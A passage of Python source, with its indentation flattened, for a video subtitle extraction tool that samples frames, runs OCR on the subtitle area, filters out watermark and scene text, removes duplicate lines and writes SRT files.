def __init__(self):
# Get the argument object
args = utility.parse_args()
args.det_algorithm = 'DB'
args.det_model_dir = config.DET_MODEL_FAST_PATH
self.text_detector = TextDetector(args)
def detect_subtitle(self, img):
dt_boxes, elapse = self.text_detector(img)
return dt_boxes, elapse
class SubtitleExtractor:
"""
Video subtitle extraction class
"""
def __init__(self, vd_path, sub_area=None):
# Subtitle area position
self.sub_area = sub_area
self.sub_detector = SubtitleDetect()
# Temporary output folder
self.temp_output_dir = os.path.join(os.path.dirname(config.BASE_DIR), 'output')
# Video path
self.video_path = vd_path
self.video_cap = cv2.VideoCapture(vd_path)
# Total number of video frames
self.frame_count = self.video_cap.get(cv2.CAP_PROP_FRAME_COUNT)
# Video frame rate
self.fps = self.video_cap.get(cv2.CAP_PROP_FPS)
# Video dimensions
self.frame_height = int(self.video_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.frame_width = int(self.video_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
# Area where subtitles appear
self.subtitle_area = config.SUBTITLE_AREA
print(f"{interface_config['Main']['FrameCount']}:{self.frame_count},{interface_config['Main']['FrameRate']}:{self.fps}")
# Directory for storing extracted video frames
self.frame_output_dir = os.path.join(self.temp_output_dir, 'frames')
# Directory for storing extracted subtitle files
self.subtitle_output_dir = os.path.join(self.temp_output_dir, 'subtitle')
# Path of the vsf (VideoSubFinder) subtitle output
self.vsf_subtitle = os.path.join(self.subtitle_output_dir, 'raw_vsf.srt')
# Create the folders if they do not exist
if not os.path.exists(self.frame_output_dir):
os.makedirs(self.frame_output_dir)
if not os.path.exists(self.subtitle_output_dir):
os.makedirs(self.subtitle_output_dir)
# Path for storing the raw extracted subtitle text
self.raw_subtitle_path = os.path.join(self.subtitle_output_dir, 'raw.txt')
# Custom ocr object
self.ocr = OcrRecogniser()
# Processing progress
self.progress = 0
def run(self):
"""
Run the whole video subtitle extraction pipeline
"""
print(interface_config['Main']['StartProcessFrame'])
if self.sub_area is not None:
# If accurate mode is enabled
if config.ACCURATE_MODE_ON:
# Accurate mode enabled and GPU acceleration available
if config.USE_GPU:
self.extract_frame_by_det()
else:
self.extract_frame_by_fps()
# If accurate mode is not enabled
else:
# Accurate mode disabled and the operating system is Windows
if platform.system() == 'Windows':
self.extract_frame_by_vsf()
else:
self.extract_frame_by_fps()
else:
self.extract_frame_by_fps()
print(interface_config['Main']['FinishProcessFrame'])
print(interface_config['Main']['StartFindSub'])
# Reset the progress bar
self.progress = 0
self.extract_subtitles()
print(interface_config['Main']['FinishFindSub'])
if self.sub_area is None:
print(interface_config['Main']['StartDetectWaterMark'])
# Ask the user whether the video has a watermark area
user_input = input(interface_config['Main']['checkWaterMark']).strip()
if user_input == 'y':
self.filter_watermark()
print(interface_config['Main']['FinishDetectWaterMark'])
else:
print('-----------------------------')
if self.sub_area is None:
print(interface_config['Main']['StartDeleteNonSub'])
self.filter_scene_text()
print(interface_config['Main']['FinishDeleteNonSub'])
print(interface_config['Main']['StartGenerateSub'])
# Check whether accurate mode is enabled
if config.ACCURATE_MODE_ON:
# If accurate mode is enabled, use the native subtitle generation
self.generate_subtitle_file()
else:
# Otherwise, on Windows, default to vsf-based extraction
if platform.system() == 'Windows':
self.generate_subtitle_file_vsf()
else:
self.generate_subtitle_file()
# If the recognised subtitle language can contain English, re-segment the English words
if config.REC_CHAR_TYPE in ('ch', 'EN', 'en', 'ch_tra'):
reformat(os.path.join(os.path.splitext(self.video_path)[0] + '.srt'))
print(interface_config['Main']['FinishGenerateSub'])
self.progress = 100
def extract_frame(self):
"""
Depending on the video resolution, scale high-resolution frames down to 1280*720,
then crop out the image region given by the subtitle area position
"""
# Clear the cache
self.__delete_frame_cache()
# Frame number of the current video frame
frame_no = 0
while self.video_cap.isOpened():
ret, frame = self.video_cap.read()
# Reading a frame failed (the last frame of the video has been reached)
if not ret:
break
# Frame read successfully
else:
frame_no += 1
frame = self._frame_preprocess(frame)
# Zero-pad the frame name to 8 digits, used later for sorting and timestamp conversion
# A 10h movie at 120 fps has at most 10*60*60*120 = 4,320,000 frames (7 digits), so 8 digits are enough
filename = os.path.join(self.frame_output_dir, str(frame_no).zfill(8) + '.jpg')
# Save the video frame
cv2.imwrite(filename, frame)
# Compare the current frame with the following frames using cosine similarity
compare_times = 0
while self.video_cap.isOpened():
ret, frame_next = self.video_cap.read()
if ret:
frame_no += 1
# Update the progress bar
self.progress = (frame_no / self.frame_count) * 100
frame_next = self._frame_preprocess(frame_next)
cosine_distance = self._compute_image_similarity(Image.fromarray(frame),
Image.fromarray(frame_next))
compare_times += 1
if compare_times == config.FRAME_COMPARE_TIMES:
break
if cosine_distance > config.COSINE_SIMILARITY_THRESHOLD:
# If the similarity between the next frame and the current frame exceeds the threshold, skip that frame
continue
# If the similarity is below the threshold, stop this while loop
else:
break
else:
break
self.video_cap.release()
def extract_frame_by_fps(self):
"""
Extract video frames at fixed intervals based on the frame rate; fast, but subtitles may be missed
"""
# Clear the cache
self.__delete_frame_cache()
# Frame number of the current video frame
frame_no = 0
while self.video_cap.isOpened():
ret, frame = self.video_cap.read()
# Reading a frame failed (the last frame of the video has been reached)
if not ret:
break
# Frame read successfully
else:
frame_no += 1
frame = self._frame_preprocess(frame)
# Zero-pad the frame name to 8 digits, used later for sorting and timestamp conversion
# A 10h movie at 120 fps has at most 10*60*60*120 = 4,320,000 frames (7 digits), so 8 digits are enough
filename = os.path.join(self.frame_output_dir, str(frame_no).zfill(8) + '.jpg')
# Save the video frame
cv2.imwrite(filename, frame)
# Skip the remaining frames
for i in range(int(self.fps // config.EXTRACT_FREQUENCY) - 1):
ret, _ = self.video_cap.read()
if ret:
frame_no += 1
# Update the progress bar
self.progress = (frame_no / self.frame_count) * 100
self.video_cap.release()
def extract_frame_by_det(self):
"""
Extract subtitle frames by running text detection on the subtitle area
"""
# Clear the cache
self.__delete_frame_cache()
# Frame number of the current video frame
frame_no = 0
while self.video_cap.isOpened():
ret, frame = self.video_cap.read()
# Reading a frame failed (the last frame of the video has been reached)
if not ret:
break
# Frame read successfully
else:
frame_no += 1
if self.sub_area is not None:
ymin, ymax, xmin, xmax = self.sub_area
dt_boxes, elapse = self.sub_detector.detect_subtitle(frame[ymin:ymax, xmin:xmax])
if len(dt_boxes) > 0:
# Zero-pad the frame name to 8 digits, used later for sorting and timestamp conversion
# A 10h movie at 120 fps has at most 10*60*60*120 = 4,320,000 frames (7 digits), so 8 digits are enough
filename = os.path.join(self.frame_output_dir, str(frame_no).zfill(8) + '.jpg')
# Look up the last two images in the frame directory
frame_list = sorted([i for i in os.listdir(self.frame_output_dir) if i.endswith('.jpg')])
# If the frame list contains two or more images, take out the last two; otherwise just save the current frame
if len(frame_list) < 2:
# Save the video frame
cv2.imwrite(filename, frame)
else:
frame_last = cv2.imread(os.path.join(self.frame_output_dir, frame_list[-1]))
frame_last_2nd = cv2.imread(os.path.join(self.frame_output_dir, frame_list[-2]))
if self._compare_ocr_result(frame_last, frame_last_2nd):
if self._compare_ocr_result(frame_last, frame):
# If the last two saved frames have the same content, and the last one matches the current frame,
# delete the last saved image and store the current frame as the new last frame
os.remove(os.path.join(self.frame_output_dir, frame_list[-1]))
cv2.imwrite(filename, frame)
self.progress = (frame_no / self.frame_count) * 100
print(f"{interface_config['Main']['SubFrameNo']}:{frame_no}, {interface_config['Main']['Elapse']}: {elapse}")
self.video_cap.release()
def extract_frame_by_vsf(self):
"""
Obtain subtitle frames by calling VideoSubFinder
"""
def count_process():
duration_ms = (self.frame_count / self.fps) * 1000
while True:
rgb_images_path = os.path.join(self.temp_output_dir, 'RGBImages')
if os.path.exists(rgb_images_path):
rgb_images = sorted(os.listdir(rgb_images_path))
if len(os.listdir(self.frame_output_dir)) > 0:
break
if len(rgb_images) > 0:
rgb_images_last = rgb_images[-1]
h, m, s, ms = rgb_images_last.split('__')[0].split('_')
total_ms = int(ms) + int(s) * 1000 + int(m) * 60 * 1000 + int(h) * 60 * 60 * 1000
if total_ms / duration_ms > 1:
self.progress = 100
else:
self.progress = (total_ms / duration_ms) * 100
else:
continue
# Clear the cache
self.__delete_frame_cache()
# Path of the VideoSubFinder executable
path_vsf = os.path.join(config.BASE_DIR, '', 'subfinder', 'VideoSubFinderWXW.exe')
# top_end: proportion of the upper part of the image, in the range [0-1]
top_end = 1 - self.sub_area[0] / self.frame_height
# bottom_end: proportion of the lower part of the image, in the range [0-1]
bottom_end = 1 - self.sub_area[1] / self.frame_height
# left_end: proportion of the left part of the image, in the range [0-1]
left_end = self.sub_area[2] / self.frame_width
# right_end: proportion of the right part of the image, in the range [0-1]
right_end = self.sub_area[3] / self.frame_width
# Build the command to execute
cmd = path_vsf + " -c -r" + " -i \"" + self.video_path + "\" -o " + self.temp_output_dir + f' -ces {self.vsf_subtitle}' + f' -te {top_end}' + f' -be {bottom_end}' + f' -le {left_end}' + f' -re {right_end}'
# Track progress
Thread(target=count_process, daemon=True).start()
import subprocess
subprocess.run(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Extract the subtitle frames
cap = cv2.VideoCapture(self.video_path)
for i, frame_name in enumerate(os.listdir(os.path.join(self.temp_output_dir, 'RGBImages'))):
timestamp = frame_name.split('__')[0]
h, m, s, ms = timestamp.split('_')
total_ms = int(ms) + int(s) * 1000 + int(m) * 60 * 1000 + int(h) * 60 * 60 * 1000
cap.set(cv2.CAP_PROP_POS_MSEC, total_ms)
ret, frame = cap.read()
if ret:
img_name = os.path.join(self.frame_output_dir, f'{str(i + 1).zfill(8)}.jpg')
cv2.imwrite(img_name, frame)
# Release resources
cap.release()
def extract_subtitle_frame(self):
"""
Extract the video frames that contain subtitles
"""
# Clear the cache
self.__delete_frame_cache()
# Get the list of subtitle frame indices
subtitle_frame_list = self._analyse_subtitle_frame()
if subtitle_frame_list is None:
print(interface_config['Main']['ChooseSubArea'])
return
cap = cv2.VideoCapture(self.video_path)
idx = 0
index = 0
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
if idx in subtitle_frame_list and idx != 0:
filename = os.path.join(self.frame_output_dir, str(idx).zfill(8) + '.jpg')
frame = self._frame_preprocess(frame)
cv2.imwrite(filename, frame)
subtitle_frame_list.remove(idx)
index += 1
idx = idx + 1
cap.release()
def extract_subtitles(self):
"""
Extract subtitle information from the video frames and write it to a txt file
"""
# Initialise the text recognition object
text_recogniser = OcrRecogniser()
# List of video frames
frame_list = [i for i in sorted(os.listdir(self.frame_output_dir)) if i.endswith('.jpg')]
# Clear the cache
if os.path.exists(self.raw_subtitle_path):
os.remove(self.raw_subtitle_path)
# Create a new file
f = open(self.raw_subtitle_path, mode='w+', encoding='utf-8')
for i, frame in enumerate(frame_list):
# Read the video frame
img = cv2.imread(os.path.join(self.frame_output_dir, frame))
# Get the detection results
dt_box, rec_res = text_recogniser.predict(img)
# Get the text coordinates
coordinates = self.__get_coordinates(dt_box)
# Write the results into the txt file
text_res = [(res[0], res[1]) for res in rec_res]
# Progress bar
self.progress = i / len(frame_list) * 100
for content, coordinate in zip(text_res, coordinates):
if self.sub_area is not None:
s_ymin = self.sub_area[0]
s_ymax = self.sub_area[1]
s_xmin = self.sub_area[2]
s_xmax = self.sub_area[3]
xmin = coordinate[0]
xmax = coordinate[1]
ymin = coordinate[2]
ymax = coordinate[3]
if s_xmin <= xmin and xmax <= s_xmax and s_ymin <= ymin and ymax <= s_ymax:
print(content[0])
if content[1] > config.DROP_SCORE:
f.write(f'{os.path.splitext(frame)[0]}\t'
f'{coordinate}\t'
f'{content[0]}\n')
else:
f.write(f'{os.path.splitext(frame)[0]}\t'
f'{coordinate}\t'
f'{content[0]}\n')
# Close the file
f.close()
def filter_watermark(self):
"""
Remove text located in watermark areas from the raw subtitle text
"""
# Get the potential watermark areas
watermark_areas = self._detect_watermark_area()
# Read a random image from the frame directory and mark the watermark areas on it, so the user can judge from the picture whether they really are watermarks
frame_path = os.path.join(self.frame_output_dir,
random.choice(
[i for i in sorted(os.listdir(self.frame_output_dir)) if i.endswith('.jpg')]))
sample_frame = cv2.imread(frame_path)
# Number the potential watermark areas
area_num = ['E', 'D', 'C', 'B', 'A']
for watermark_area in watermark_areas:
ymin = min(watermark_area[0][2], watermark_area[0][3])
ymax = max(watermark_area[0][3], watermark_area[0][2])
xmin = min(watermark_area[0][0], watermark_area[0][1])
xmax = max(watermark_area[0][1], watermark_area[0][0])
cover = sample_frame[ymin:ymax, xmin:xmax]
cover = cv2.blur(cover, (10, 10))
cv2.rectangle(cover, pt1=(0, cover.shape[0]), pt2=(cover.shape[1], 0), color=(0, 0, 255), thickness=3)
sample_frame[ymin:ymax, xmin:xmax] = cover
position = ((xmin + xmax) // 2, ymax)
cv2.putText(sample_frame, text=area_num.pop(), org=position, fontFace=cv2.FONT_HERSHEY_SIMPLEX,
fontScale=1, color=(255, 0, 0), thickness=2, lineType=cv2.LINE_AA)
sample_frame_file_path = os.path.join(os.path.dirname(self.frame_output_dir), 'watermark_area.jpg')
cv2.imwrite(sample_frame_file_path, sample_frame)
print(f"{interface_config['Main']['WatchPicture']}: {sample_frame_file_path}")
area_num = ['E', 'D', 'C', 'B', 'A']
for watermark_area in watermark_areas:
user_input = input(f"{area_num.pop()}{str(watermark_area)} {interface_config['Main']['QuestionDelete']}").strip()
if user_input == 'y' or user_input == '\n':
with open(self.raw_subtitle_path, mode='r+', encoding='utf-8') as f:
content = f.readlines()
f.seek(0)
for i in content:
if i.find(str(watermark_area[0])) == -1:
f.write(i)
f.truncate()
print(interface_config['Main']['FinishDelete'])
print(interface_config['Main']['FinishWaterMarkFilter'])
# Clear the cache
if os.path.exists(sample_frame_file_path):
os.remove(sample_frame_file_path)
def filter_scene_text(self):
"""
Filter out text extracted from the scene, keeping only the subtitle area
"""
# Get the potential subtitle area
subtitle_area = self._detect_subtitle_area()[0][0]
# Read a random image from the frame directory and mark the subtitle area on it, so the user can judge from the picture whether it really is the subtitle area
frame_path = os.path.join(self.frame_output_dir,
random.choice(
[i for i in sorted(os.listdir(self.frame_output_dir)) if i.endswith('.jpg')]))
sample_frame = cv2.imread(frame_path)
# To allow for two-line subtitles, expand the y range of the subtitle area by the configured tolerance
ymin = abs(subtitle_area[0] - config.SUBTITLE_AREA_DEVIATION_PIXEL)
ymax = subtitle_area[1] + config.SUBTITLE_AREA_DEVIATION_PIXEL
# Draw the subtitle area rectangle
cv2.rectangle(sample_frame, pt1=(0, ymin), pt2=(sample_frame.shape[1], ymax), color=(0, 0, 255), thickness=3)
sample_frame_file_path = os.path.join(os.path.dirname(self.frame_output_dir), 'subtitle_area.jpg')
cv2.imwrite(sample_frame_file_path, sample_frame)
print(f"{interface_config['Main']['CheckSubArea']} {sample_frame_file_path}")
user_input = input(f"{(ymin, ymax)} {interface_config['Main']['DeleteNoSubArea']}").strip()
if user_input == 'y' or user_input == '\n':
with open(self.raw_subtitle_path, mode='r+', encoding='utf-8') as f:
content = f.readlines()
f.seek(0)
for i in content:
i_ymin = int(i.split('\t')[1].split('(')[1].split(')')[0].split(', ')[2])
i_ymax = int(i.split('\t')[1].split('(')[1].split(')')[0].split(', ')[3])
if ymin <= i_ymin and i_ymax <= ymax:
f.write(i)
f.truncate()
print(interface_config['Main']['FinishDeleteNoSubArea'])
# Clear the cache
if os.path.exists(sample_frame_file_path):
os.remove(sample_frame_file_path)
def generate_subtitle_file(self):
"""
Generate a subtitle file in srt format
"""
subtitle_content = self._remove_duplicate_subtitle()
srt_filename = os.path.join(os.path.splitext(self.video_path)[0] + '.srt')
# Keep subtitle lines that last less than 1 second, for later post-processing
post_process_subtitle = []
with open(srt_filename, mode='w', encoding='utf-8') as f:
for index, content in enumerate(subtitle_content):
line_code = index + 1
frame_start = self._frame_to_timecode(int(content[0]))
# Compare the start and end frame numbers; if the subtitle lasts less than 1 second, set its display time to 1s
if abs(int(content[1]) - int(content[0])) < self.fps:
frame_end = self._frame_to_timecode(int(int(content[0]) + self.fps))
post_process_subtitle.append(line_code)
else:
frame_end = self._frame_to_timecode(int(content[1]))
frame_content = content[2]
subtitle_line = f'{line_code}\n{frame_start} --> {frame_end}\n{frame_content}\n'
f.write(subtitle_line)
print(f"{interface_config['Main']['SubLocation']} {srt_filename}")
# Return the subtitle lines that last less than 1s
return post_process_subtitle
def generate_subtitle_file_vsf(self):
try:
subtitle_timestamp = []
with open(self.vsf_subtitle, mode='r', encoding='utf-8') as f:
lines = f.readlines()
timestamp = []
frame_no = []
for line in lines:
if re.match(r'^\d{1,}$', line):
frame_no.append(line.replace('\n', '').replace('\r', '').zfill(8))
if re.match(r'^\d{2,}:\d{2,}:\d{2,},\d{1,3}.*', line):
timestamp.append(line.replace('\n', '').replace('\r', ''))
for i in zip(frame_no, timestamp):
subtitle_timestamp.append(i)
subtitle_content = self._remove_duplicate_subtitle()
final_subtitle = []
for sc in subtitle_content:
frame_no = sc[0]
content = sc[2]
for st in subtitle_timestamp:
if st[0] == frame_no:
timestamp = st[1]
final_subtitle.append((timestamp, content))
srt_filename = os.path.join(os.path.splitext(self.video_path)[0] + '.srt')
with open(srt_filename, mode='w', encoding='utf-8') as f:
for i, subtitle_line in enumerate(final_subtitle):
f.write(f'{i + 1}\n')
f.write(f'{subtitle_line[0]}\n')
f.write(f'{subtitle_line[1]}\n')
print(f"{interface_config['Main']['SubLocation']} {srt_filename}")
except FileNotFoundError:
self.generate_subtitle_file()
def _analyse_subtitle_frame(self):
"""
Use a simple image algorithm to find the video frames that contain subtitles
: reference https://github.com/BruceHan98/OCR-Extract-Subtitles/blob/main/analyze_key_frame.py
"""
if self.sub_area is None:
return None
else:
subtitle_frame_index_list = []
index = 0
s_ymin = self.sub_area[0]
s_ymax = self.sub_area[1]
s_xmin = self.sub_area[2]
s_xmax = self.sub_area[3]
cap = cv2.VideoCapture(self.video_path)
success, frame = cap.read()
if success:
# Crop out the subtitle part
frame = frame[s_ymin:s_ymax, s_xmin:s_xmax]
h, w = frame.shape[0:2]
if config.BG_MOD == config.BackgroundColor.DARK: # dark background
minuend = np.full(h * w, config.BG_VALUE_DARK) # background threshold matrix to subtract
else:
minuend = np.full(h * w, config.BG_VALUE_OTHER) # background threshold matrix to subtract
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
flatten_gray = gray.flatten()
last_roi = flatten_gray - minuend
last_roi = np.where(last_roi > 0, 1, 0)
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
frame = frame[s_ymin:s_ymax, s_xmin:s_xmax]
if index % config.EXTRACT_INTERVAL == 0:
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
flatten_gray = gray.flatten()
roi = flatten_gray - minuend
roi = np.where(roi > 0, 1, 0)
change = roi - last_roi
addi = np.where(change > 0, 1, 0).sum()
if addi > roi.sum() * config.ROI_RATE: # subtitle content increased
subtitle_frame_index_list.append(index)
last_roi = roi
index += 1
cap.release()
return subtitle_frame_index_list
def _detect_watermark_area(self):
"""
Find watermark areas from the coordinate information in the recognised raw txt file.
Assumption: the coordinates of a watermark area (e.g. a station logo) are fixed both horizontally and vertically, i.e. its (xmin, xmax, ymin, ymax) stays relatively constant.
Collect statistics over the coordinates and pick out the text areas that always keep fixed coordinates.
:return: the most likely watermark areas
"""
f = open(self.raw_subtitle_path, mode='r', encoding='utf-8') # open the txt file and read it with utf-8 encoding
line = f.readline() # read the file line by line
# List of coordinate points
coordinates_list = []
# List of frame numbers
frame_no_list = []
# List of text content
content_list = []
while line:
frame_no = line.split('\t')[0]
text_position = line.split('\t')[1].split('(')[1].split(')')[0].split(', ')
content = line.split('\t')[2]
frame_no_list.append(frame_no)
coordinates_list.append((int(text_position[0]),
int(text_position[1]),
int(text_position[2]),
int(text_position[3])))
content_list.append(content)
line = f.readline()
f.close()
# Unify similar values in the coordinate list
coordinates_list = self._unite_coordinates(coordinates_list)
# Update the coordinates in the original txt file to the unified coordinates
with open(self.raw_subtitle_path, mode='w', encoding='utf-8') as f:
for frame_no, coordinate, content in zip(frame_no_list, coordinates_list, content_list):
f.write(f'{frame_no}\t{coordinate}\t{content}')
if len(Counter(coordinates_list).most_common()) > config.WATERMARK_AREA_NUM:
# Return the list of coordinates that may be watermark areas, up to the configured number
return Counter(coordinates_list).most_common(config.WATERMARK_AREA_NUM)
else:
# If there are fewer, return however many there are
return Counter(coordinates_list).most_common()
def _detect_subtitle_area(self):
"""
Read the raw txt file after watermark filtering and use the coordinate information to find the subtitle area.
Assumption: the subtitle area occupies a relatively fixed coordinate range on the y axis, and this range appears more frequently than scene text.
:return: the position of the subtitle area
"""
# Open the raw txt that has already had watermark areas removed
f = open(self.raw_subtitle_path, mode='r', encoding='utf-8') # open the txt file and read it with utf-8 encoding
line = f.readline() # read the file line by line
# List of y coordinates
y_coordinates_list = []
while line:
text_position = line.split('\t')[1].split('(')[1].split(')')[0].split(', ')
y_coordinates_list.append((int(text_position[2]), int(text_position[3])))
line = f.readline()
f.close()
return Counter(y_coordinates_list).most_common(1)
def _frame_preprocess(self, frame):
"""
Crop the video frame
"""
# For videos with a resolution above 1920*1080, scale the frames proportionally down to 1280*720 for recognition
# paddlepaddle compresses the image to 640*640
# if self.frame_width > 1280:
# scale_rate = round(float(1280 / self.frame_width), 2)
# frames = cv2.resize(frames, None, fx=scale_rate, fy=scale_rate, interpolation=cv2.INTER_AREA)
cropped = int(frame.shape[0] // 2)
# If the subtitle area is in the lower part
if self.subtitle_area == config.SubtitleArea.LOWER_PART:
# Crop the frame to its lower half
frame = frame[cropped:]
# If the subtitle area is in the upper part
elif self.subtitle_area == config.SubtitleArea.UPPER_PART:
# Crop the frame to its upper half
frame = frame[:cropped]
return frame
def _frame_to_timecode(self, frame_no):
"""
Convert a video frame number into a timestamp
:param frame_no: frame number of the video, i.e. which frame it is
:returns: SMPTE-style timecode as string, e.g. '01:02:12:32' or '01:02:12;32'
"""
# Seek to the given frame number
cap = cv2.VideoCapture(self.video_path)
cap.set(cv2.CAP_PROP_POS_FRAMES, frame_no)
cap.read()
# Get the timestamp corresponding to the current frame number
milliseconds = cap.get(cv2.CAP_PROP_POS_MSEC)
seconds = milliseconds // 1000
milliseconds = int(milliseconds % 1000)
minutes = 0
hours = 0
if seconds >= 60:
minutes = int(seconds // 60)
seconds = int(seconds % 60)
if minutes >= 60:
hours = int(minutes // 60)
minutes = int(minutes % 60)
smpte_token = ','
cap.release()
return "%02d:%02d:%02d%s%02d" % (hours, minutes, seconds, smpte_token, milliseconds)
def _remove_duplicate_subtitle(self):
"""
Read the raw txt, remove duplicate lines, and return the de-duplicated subtitle list
"""
self._concat_content_with_same_frameno()
with open(self.raw_subtitle_path, mode='r', encoding='utf-8') as r:
lines = r.readlines()
content_list = []
for line in lines:
frame_no = line.split('\t')[0]
content = line.split('\t')[2]
content_list.append((frame_no, content))
# Iterate over each subtitle line and record its start and end times
index = 0
# De-duplicated subtitle list
unique_subtitle_list = []
for i in content_list:
# TODO: the time complexity here is very high and needs optimisation
# Frame number where this subtitle starts
start_frame = i[0]
for j in content_list[index:]:
# Compute the Levenshtein ratio between the current line and the next line
distance = ratio(i[1], j[1])
if distance < config.THRESHOLD_TEXT_SIMILARITY or j == content_list[-1]:
# Frame number where the subtitle ends
end_frame = content_list[content_list.index(j) - 1][0]
if end_frame == start_frame:
end_frame = j[0]
# If this is the first subtitle line, add it to the list directly
if len(unique_subtitle_list) < 1:
unique_subtitle_list.append((start_frame, end_frame, i[1]))
else:
string_a = unique_subtitle_list[-1][2].replace(' ', '')
string_b = i[1].replace(' ', '')
similarity_ratio = ratio(string_a, string_b)
# Print the similarity
# print(f'{similarity_ratio}: {unique_subtitle_list[-1][2]} vs {i[1]}')
# If the similarity is below the threshold, the two subtitle lines are different
if similarity_ratio < config.THRESHOLD_TEXT_SIMILARITY:
unique_subtitle_list.append((start_frame, end_frame, i[1]))
else:
# If the similarity is above the threshold but not exactly 1, the two subtitle lines are similar
# e.g. the following can happen: "但如何进人并接管上海" vs "但如何进入并接管上海"
# i.e. an OCR misrecognition occurred
if similarity_ratio < 1:
# TODO:
# 1) take the union of the two subtitle lines
# 2) correct the recognition errors
# print(f'{round(similarity_ratio, 2)}, manual correction needed:\n {string_a} vs\n {string_b}')
# Keep the longer one
if len(string_a) < len(string_b):
unique_subtitle_list[-1] = (start_frame, end_frame, i[1])
index += 1
break
else:
continue
return unique_subtitle_list
def _concat_content_with_same_frameno(self):
"""
Merge subtitle lines in the raw txt that share the same frame number
"""
with open(self.raw_subtitle_path, mode='r', encoding='utf-8') as r:
lines = r.readlines()
content_list = []
frame_no_list = []
for line in lines:
frame_no = line.split('\t')[0]
frame_no_list.append(frame_no)
coordinate = line.split('\t')[1]
content = line.split('\t')[2]
content_list.append([frame_no, coordinate, content])
# Find the frame numbers that have more than one line
frame_no_list = [i[0] for i in Counter(frame_no_list).most_common() if i[1] > 1]
# Find the positions where these frame numbers occur
concatenation_list = []
for frame_no in frame_no_list:
position = [i for i, x in enumerate(content_list) if x[0] == frame_no]
concatenation_list.append((frame_no, position))
for i in concatenation_list:
content = []
for j in i[1]:
content.append(content_list[j][2])
content = ' '.join(content).replace('\n', ' ') + '\n'
for k in i[1]:
content_list[k][2] = content
# Delete the redundant subtitle lines
to_delete = []
for i in concatenation_list:
for j in i[1][1:]:
to_delete.append(content_list[j])
for i in to_delete:
if i in content_list:
content_list.remove(i)
with open(self.raw_subtitle_path, mode='w', encoding='utf-8') as f:
for frame_no, coordinate, content in content_list:
content = unicodedata.normalize('NFKC', content)
f.write(f'{frame_no}\t{coordinate}\t{content}')
def _unite_coordinates(self, coordinates_list):
"""
Given a list of coordinates, unify similar coordinates in the list to a single value
e.g. because detection-box results are not perfectly consistent, text at the same position may be detected once as (255,123,456,789) and another time as (253,122,456,799)
so similar coordinates need to be unified to the same value
:param coordinates_list: list containing coordinate points
:return: the coordinate list after value unification
"""
# Unify similar coordinates into one
index = 0
for coordinate in coordinates_list: # TODO: O(n^2) time complexity, needs optimisation
for i in coordinates_list:
if self.__is_coordinate_similar(coordinate, i):
coordinates_list[index] = i
index += 1
return coordinates_list
def _compute_image_similarity(self, image1, image2):
"""
Compute the cosine similarity of two images
"""
image1 = self.__get_thum(image1)
image2 = self.__get_thum(image2)
images = [image1, image2]
vectors = []
norms = []
for image in images:
vector = []
for pixel_tuple in image.getdata():
vector.append(average(pixel_tuple))
vectors.append(vector)
# linalg = linear algebra; norm here means the vector norm
# compute the norm of the image vector
norms.append(linalg.norm(vector, 2))
a, b = vectors
a_norm, b_norm = norms
# dot returns the dot product (for 2-D arrays it would be matrix multiplication)
res = dot(a / a_norm, b / b_norm)
return res
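# The value returned above is the cosine similarity of the two thumbnail vectors:
#   cos(a, b) = (a . b) / (|a| * |b|)
# For non-negative pixel vectors it lies in [0, 1], and identical images give 1.0, which is why
# frames whose similarity exceeds COSINE_SIMILARITY_THRESHOLD are skipped during frame extraction.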
def __get_area_text(self, ocr_result):
"""
Get the text content inside the subtitle area
"""
box, text = ocr_result
coordinates = self.__get_coordinates(box)
area_text = []
for content, coordinate in zip(text, coordinates):
if self.sub_area is not None:
s_ymin = self.sub_area[0]
s_ymax = self.sub_area[1]
s_xmin = self.sub_area[2]
s_xmax = self.sub_area[3]
xmin = coordinate[0]
xmax = coordinate[1]
ymin = coordinate[2]
ymax = coordinate[3]
if s_xmin <= xmin and xmax <= s_xmax and s_ymin <= ymin and ymax <= s_ymax:
area_text.append(content[0])
return area_text
def _compare_ocr_result(self, img1, img2):
"""
Compare whether the subtitle-area text predicted from two images is the same
"""
area_text1 = "".join(self.__get_area_text(self.ocr.predict(img1)))
area_text2 = "".join(self.__get_area_text(self.ocr.predict(img2)))
if ratio(area_text1, area_text2) > config.THRESHOLD_TEXT_SIMILARITY:
return True
else:
return False
@staticmethod
def __get_coordinates(dt_box):
"""
Get coordinates from the returned detection boxes
:param dt_box: detection box results
:return: list of coordinate points
"""
coordinate_list = list()
if isinstance(dt_box, list):
for i in dt_box:
i = list(i)
(x1, y1) = int(i[0][0]), int(i[0][1])
(x2, y2) = int(i[1][0]), int(i[1][1])
(x3, y3) = int(i[2][0]), int(i[2][1])
(x4, y4) = int(i[3][0]), int(i[3][1])
xmin = max(x1, x4)
xmax = min(x2, x3)
ymin = max(y1, y2)
ymax = min(y3, y4)
coordinate_list.append((xmin, xmax, ymin, ymax))
return coordinate_list
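# Worked example (sketch): for a detection quad [[10, 40], [210, 42], [212, 80], [12, 78]]
# the corners give xmin = max(10, 12) = 12, xmax = min(210, 212) = 210, ymin = max(40, 42) = 42,
# ymax = min(80, 78) = 78, so the box is stored as (12, 210, 42, 78).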
@staticmethod
def __is_coordinate_similar(coordinate1, coordinate2):
"""
Determine whether two coordinates are similar: if the differences in xmin, xmax, ymin and ymax
are all within the pixel tolerance, the two coordinate points are considered similar
"""
return abs(coordinate1[0] - coordinate2[0]) < config.PIXEL_TOLERANCE_X and \
abs(coordinate1[1] - coordinate2[1]) < config.PIXEL_TOLERANCE_X and \
abs(coordinate1[2] - coordinate2[2]) < config.PIXEL_TOLERANCE_Y and \
abs(coordinate1[3] - coordinate2[3]) < config.PIXEL_TOLERANCE_Y
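# Worked example (hypothetical tolerances): with PIXEL_TOLERANCE_X = 10 and PIXEL_TOLERANCE_Y = 10,
# (255, 123, 456, 789) and (253, 122, 458, 795) differ by (2, 1, 2, 6), all strictly within the
# tolerances, so the two coordinates would be treated as similar under those settings.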
@staticmethod
def __get_thum(image, size=(64, 64), greyscale=False):
"""
Normalise the image to a standard size
"""
# Resize the image with PIL; Image.ANTIALIAS gives high-quality resampling
image = image.resize(size, Image.ANTIALIAS)
if greyscale:
# Convert the image to mode 'L' (greyscale), where each pixel is represented by 8 bits
image = image.convert('L')
return image
def __delete_frame_cache(self):
